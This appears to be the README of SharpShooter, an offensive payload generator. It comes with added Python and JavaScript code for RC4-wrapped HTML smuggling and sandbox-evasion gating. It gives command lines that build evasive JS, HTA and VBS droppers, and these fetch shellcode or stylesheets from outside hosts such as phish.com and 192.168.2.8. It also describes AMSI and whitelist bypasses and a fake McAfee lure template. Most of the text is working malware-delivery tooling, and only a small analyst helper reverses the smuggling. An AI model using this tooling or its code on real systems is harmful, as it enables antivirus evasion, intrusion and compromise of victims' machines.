SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.
SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp's CodeDom provider.
Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.
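The two mechanisms above, RC4 wrapping under a random key and Demiguise-style HTML smuggling, fit together in the following added Python example. It is not SharpShooter's or Demiguise's own code: the page template, the `__KEY__`/`__BLOB__`/`__NAME__` placeholders and the `recover_file()` helper are assumptions made for illustration. The generator encrypts the payload and embeds key and ciphertext in a page whose script rebuilds the file in the browser; the analyst-side helper shows that, because the key has to travel inside the page, the wrapping defeats static content inspection rather than providing confidentiality.

```python
"""Added example, not SharpShooter's or Demiguise's own code.

RC4-wrap a payload under a random key and embed it in an HTML page that
rebuilds the file client-side (HTML smuggling). recover_file() is the
analyst's side: pull the key and blob back out of such a page.
"""
import base64
import json
import os
import re
from typing import Optional, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA); the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Browser-side half of the technique. The __KEY__/__BLOB__/__NAME__ placeholders
# are assumptions of this example and are filled in by build_smuggled_html().
_PAGE = """<!DOCTYPE html>
<html><body>
<p>Your download will begin shortly.</p>
<script>
// Same RC4 as the generator, running in the victim's browser.
function rc4(key, data) {
  var S = [], i, j = 0, t, out = new Uint8Array(data.length);
  for (i = 0; i < 256; i++) S[i] = i;
  for (i = 0; i < 256; i++) {
    j = (j + S[i] + key[i % key.length]) & 255;
    t = S[i]; S[i] = S[j]; S[j] = t;
  }
  i = 0; j = 0;
  for (var k = 0; k < data.length; k++) {
    i = (i + 1) & 255;
    j = (j + S[i]) & 255;
    t = S[i]; S[i] = S[j]; S[j] = t;
    out[k] = data[k] ^ S[(S[i] + S[j]) & 255];
  }
  return out;
}
function b64(s) {
  var bin = atob(s), arr = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);
  return arr;
}
var plain = rc4(b64("__KEY__"), b64("__BLOB__"));
var blob = new Blob([plain], {type: "octet/stream"});
var name = __NAME__;
if (window.navigator.msSaveBlob) {
  window.navigator.msSaveBlob(blob, name);      // IE / legacy Edge
} else {
  var a = document.createElement("a");           // everything else
  a.href = window.URL.createObjectURL(blob);
  a.download = name;
  document.body.appendChild(a);
  a.click();
  window.URL.revokeObjectURL(a.href);
}
</script>
</body></html>
"""


def build_smuggled_html(payload: bytes, filename: str,
                        key: Optional[bytes] = None) -> str:
    """Encrypt payload under a fresh 16-byte key and return the smuggling page."""
    key = key or os.urandom(16)
    return (_PAGE.replace("__KEY__", base64.b64encode(key).decode())
                 .replace("__BLOB__", base64.b64encode(rc4(key, payload)).decode())
                 .replace("__NAME__", json.dumps(filename)))


def recover_file(page: str) -> Tuple[str, bytes]:
    """Analyst side: the key is in the page, so the file comes straight back."""
    key_b64, blob_b64 = re.findall(r'b64\("([^"]*)"\)', page)
    name = json.loads(re.search(r'var name = (".*?");', page).group(1))
    return name, rc4(base64.b64decode(key_b64), base64.b64decode(blob_b64))


if __name__ == "__main__":
    # Constructed stand-in for a real payload file.
    page = build_smuggled_html(b"MZ\x90\x00demo payload", "update.hta")
    print(recover_file(page)[0], len(page), "bytes of HTML")
```

The page never transfers the payload as a file, so proxy and mail gateways that inspect attachments see only HTML and a base64 blob; the file only exists once the browser has decrypted it and handed it to the download path. Demiguise additionally supports deriving the key from the target environment, which this example deliberately does not do: with a literal key, `recover_file()` shows how cheaply an analyst reverses the wrapping.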
SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.
Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To accomplish this new functionality, several new flags were added: --com, --awl and --awlurl.
Further information can be found on the MDSec blog post.
Usage - Command Line Mode:
SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types.
Running SharpShooter with the --help argument will produce the following output; examples of some use cases are provided further below:
usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
                       [--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
                       [--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
                       [--rawscfile <path>] [--shellcode] [--scfile <path>]
                       [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
                       [--web <web>] [--dns <dns>] [--output <output>]
                       [--smuggle] [--template <tpl>]

  -h, --help            show this help message and exit
  --stageless           Create a stageless payload
  --dotnetver <ver>     Target .NET Version: 2 or 4
  --com <com>           COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
  --awl <awl>           Application Whitelist Bypass Technique: wmic, regsvr32
  --awlurl <awlurl>     URL to retrieve XSL/SCT payload
  --payload <format>    Payload type: hta, js, jse, vba, vbe, vbs, wsf
  --sandbox <types>     Anti-sandbox techniques:
                        [1] Key to Domain (e.g. 1=CONTOSO)
                        [2] Ensure Domain Joined
                        [3] Check for Sandbox Artifacts
                        [4] Check for Bad MACs
                        [5] Check for Debugging
  --amsi <amsi>         Use amsi bypass technique: amsienable
  --delivery <type>     Delivery method: web, dns, both
  --rawscfile <path>    Path to raw shellcode file for stageless payloads
  --shellcode           Use built in shellcode execution
  --scfile <path>       Path to shellcode file as CSharp byte array
  --refs <refs>         References required to compile custom CSharp,
  --namespace <ns>      Namespace for custom CSharp,
  --entrypoint <ep>     Method to execute,
  --web <web>           URI for web delivery
  --dns <dns>           Domain for DNS delivery
  --output <output>     Name of output file (e.g. maldoc)
  --smuggle             Smuggle file inside HTML
  --template <tpl>      Name of template file (e.g. mcafee)
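The --sandbox option takes a comma-separated list of the numbered techniques, with technique 1 carrying the expected domain (1=CONTOSO). The following added Python example, which is not SharpShooter's own code, shows how such a value selects checks and how a payload would decide, from facts about the host it lands on, whether to continue. The host profiles, the virtualisation OUI list and the process-name list are constructed for illustration and are assumptions, not the project's own lists.

```python
"""Added illustration, not SharpShooter's own code.

Parse a --sandbox value such as "1=contoso,2,3" and evaluate the selected
checks against host facts supplied as a dict, so the gating logic can be
exercised offline. Lists below are examples, not the project's own.
"""
from typing import Dict, List, Optional, Tuple

CHECK_NAMES = {
    "1": "key_to_domain",
    "2": "domain_joined",
    "3": "sandbox_artifacts",
    "4": "bad_macs",
    "5": "debugging",
}

# Well-known virtualisation OUIs (assumed list). Note that Hyper-V (00:15:5D)
# also covers corporate VDI, so check 4 can refuse legitimate targets.
VIRTUAL_OUIS = ("00:05:69", "00:0C:29", "00:1C:14", "00:50:56",  # VMware
                "08:00:27",                                      # VirtualBox
                "00:1C:42",                                      # Parallels
                "00:16:3E",                                      # Xen
                "00:15:5D")                                      # Hyper-V

# Illustrative process names betraying guest agents or analysis tooling.
SANDBOX_PROCESSES = {"vmtoolsd.exe", "vboxservice.exe", "vboxtray.exe",
                     "procmon.exe", "wireshark.exe", "x64dbg.exe"}


def parse_sandbox_spec(spec: str) -> Dict[str, Optional[str]]:
    """'1=contoso,2,3' -> {'1': 'contoso', '2': None, '3': None}."""
    selected: Dict[str, Optional[str]] = {}
    for item in spec.split(","):
        num, _, value = item.strip().partition("=")
        if num not in CHECK_NAMES:
            raise ValueError(f"unknown sandbox technique {num!r}")
        if (num == "1") != bool(value):
            raise ValueError("technique 1 needs a domain (1=CONTOSO); others take none")
        selected[num] = value or None
    return selected


def evaluate_checks(spec: str, host: dict) -> Tuple[bool, List[str]]:
    """Return (run_payload, failed_checks); every selected check must pass."""
    failed: List[str] = []
    for num, value in parse_sandbox_spec(spec).items():
        name = CHECK_NAMES[num]
        if name == "key_to_domain":
            ok = host.get("domain", "").upper() == value.upper()
        elif name == "domain_joined":
            ok = bool(host.get("domain_joined"))
        elif name == "sandbox_artifacts":
            running = {p.lower() for p in host.get("processes", [])}
            ok = not (SANDBOX_PROCESSES & running)
        elif name == "bad_macs":
            ok = not any(m.upper().startswith(VIRTUAL_OUIS)
                         for m in host.get("macs", []))
        else:  # debugging
            ok = not host.get("debugger_present", False)
        if not ok:
            failed.append(name)
    return (not failed), failed


# Constructed host profiles for offline testing; not real systems.
CORP_WORKSTATION = {"domain": "CONTOSO", "domain_joined": True,
                    "macs": ["3C:52:82:AA:BB:CC"],
                    "processes": ["explorer.exe", "outlook.exe"],
                    "debugger_present": False}
SANDBOX_VM = {"domain": "WORKGROUP", "domain_joined": False,
              "macs": ["00:0C:29:11:22:33"],
              "processes": ["explorer.exe", "vmtoolsd.exe"],
              "debugger_present": False}

if __name__ == "__main__":
    print(evaluate_checks("1=contoso,2,3", CORP_WORKSTATION))
    print(evaluate_checks("2,3,4,5", SANDBOX_VM))
```

Checks 1 and 2 are the ones that key a payload to the engagement; checks 3 to 5 are generic anti-analysis tests and the MAC check in particular will refuse to run on any virtualised estate, including the target's own VDI, so select them with the environment in mind.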
Stageless JavaScript
This example creates a stageless JavaScript payload targeting version 4 of the .NET framework, written to the output directory as foo.js. The shellcode is read from the ./raw.txt file. Before executing, the payload keys itself to the CONTOSO domain, checks that the host is domain joined and checks for sandbox artifacts.
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
Stageless HTA
This example creates a stageless HTA payload targeting version 2/3 of the .NET framework, named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts some sandbox evasion by checking for known virtual MAC addresses. An HTML smuggling file named foo.html will also be generated in the output directory, using the example McAfee virus scan template.
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
Staged VBS
This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted on http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in an HTML file using the HTML smuggling technique with the McAfee virus scan template. The resultant payload is stored in the output directory named foo.html.
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
Custom CSharp inside VBS
This example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion (domain joined, sandbox artifact, bad MAC and debugging checks), then attempt to compile the retrieved payload, which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation. The resulting JS file is smuggled inside malicious.html using the McAfee template.
SharpShooter.py --dotnetver 2 --payload js --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee
Creation of a Squiblytwo VBS
This example creates a smuggled VBS COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe, which in turn executes a hosted stylesheet. The --awl parameter is not supplied and therefore defaults to wmic.
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl
Creation of a XSL HTA
This example creates a smuggled HTA file that uses the XMLDOM COM interface to retrieve and execute a hosted stylesheet.
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
Author and Credits
Author: Dominic Chell, MDSec ActiveBreach @domchell and @mdseclabs
- @tiraniddo: James Forshaw for DotNetToJScript
- @Arno0x0x: for EmbedInHTML
- @buffaloverflow: Rich Warren for Demiguise
- @arvanaghi and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for CheckPlease
- @subTee: Documentation for Squiblydoo and Squiblytwo techniques